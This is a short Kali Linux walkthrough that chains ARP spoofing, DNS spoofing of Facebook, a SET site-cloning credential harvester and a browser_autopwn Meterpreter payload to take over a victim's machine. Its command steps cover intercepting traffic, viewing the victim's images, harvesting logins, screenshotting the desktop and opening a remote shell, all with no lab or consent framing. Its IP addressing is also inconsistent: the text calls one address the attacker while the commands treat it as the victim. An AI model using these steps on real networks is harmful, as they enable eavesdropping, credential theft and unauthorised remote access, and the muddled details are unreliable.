Arp poisoning with Kali to reverse shell
ARP MITM attack first requires telling the gateway (192.168.111.222) that the attacker (192.168.2.4) is the victim and telling the victim that the attacker is the router. Use the following commands in two separate terminals in Kali:
arpspoof -i eth6 -t 192.168.111.222 192.168.2.4
arpspoof -i eth6 -t 192.168.2.4 192.168.111.222
Note that these commands will not work unless IP forwarding is enabled on the attacker's machine. Check the current status of IP forwarding with the following command:
cat /proc/sys/net/ipv4/ip_forward
If the output is "0", IP forwarding is currently disabled. To enable it, use the following command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Once a man-in-the-middle connection is established, use a tool called Driftnet (driftnet -i <interface>) to see images from the victim's web surfing.
DNS cache poisoning
DNS cache poisoning involves spoofing a website like Facebook and tricking a user into visiting the attacker's page, which can then be used to input code and obtain a reverse shell. To begin, create a text file with the following contents, and name it something like facebook:
www.facebook.com 192.168.248.204
192.168.248.204 www.facebook.com
Save this text file and then run the following command:
dnsspoof -i eth6 -f facebook
This command will intercept any DNS queries for Facebook and direct them to the attacker's machine. The attacker can then clone the Facebook page and make it appear as realistic as possible.
Next, use a client-side attack against the victim's browser using the Social Engineer Toolkit (SET) by Dave Kennedy. To install SET, run the following commands:
git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
cd setoolkit
pip3 install -r requirements.txt
python setup.py
SET is pre-installed in Kali Linux, so you can simply run setoolkit in a terminal to launch the tool. From there, select the following options:
Social Engineering Attacks
Website Attack Vectors
Credential Harvester Attack Method
Web Templates
Site Cloner
Select "no" to NAT/Port Forwarding, and enter the IP address of the attacker's machine when prompted. When asked which website to clone, enter http://www.facebook.com. Then select "browser_autopwn" and set the payload to Meterpreter (4), with port 443.
If everything goes well, a Meterpreter session will be established with the victim's machine. To access the session, use the following command:
sessions -i 1
Then type screenshot to take a screenshot of the victim's desktop, and shell to open a shell on the victim's machine. You should now have access to the victim's file system.